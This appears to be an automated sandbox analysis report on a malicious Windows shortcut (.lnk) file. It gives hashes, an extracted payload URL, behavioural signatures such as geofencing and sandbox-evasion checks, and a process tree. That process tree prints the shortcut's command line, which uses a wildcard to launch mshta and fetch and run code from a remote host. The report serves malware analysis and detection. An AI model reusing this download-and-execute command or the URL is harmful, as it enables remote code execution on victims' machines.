Analysis
-
max time kernel
1802s -
max time network
1826s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
-
submitted
23-11-2022 10:03
General
-
Target
8f05021071c4bfd4cfce3d02bd30bf16f1322170515d796e13f75eb25b09d533.lnk
-
Size
1KB
-
MD5
99066332471d626dce4b2fd8c0543aea
-
SHA1
e273ed808f0ef67b71afcb7f77da80be56228a58
-
SHA256
8f05021071c4bfd4cfce3d02bd30bf16f1322170515d796e13f75eb25b09d533
-
SHA512
95cc97a541a69bb3283221d9db0ce8ec3a9c5830c85b5c99991899706dbbd519eada6023ef77b1b0969666d1f17b366ff33d37a36db9e0130f90d6a3b35ec25c
Malware Config
Extracted
https://doc.gdocshare.one/SYsWCc9+dx+o/gL79ReA3h7/r6r1OIXpUPR0vbw20DQ=
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 35 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\8f05021071c4bfd4cfce3d02bd30bf16f1322170515d796e13f75eb25b09d533.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k for %i IN (C:\Windows\system32\*sht*xe) DO start /b %~ni "https://doc.gdocshare.one/SYsWCc9+dx+o/gL79ReA3h7/r6r1OIXpUPR0vbw20DQ=" & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta "https://doc.gdocshare.one/SYsWCc9+dx+o/gL79ReA3h7/r6r1OIXpUPR0vbw20DQ="3⤵
- Blocklisted process makes network request
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Documents\Files.docx" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Documents\Are.docx" /o ""1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
-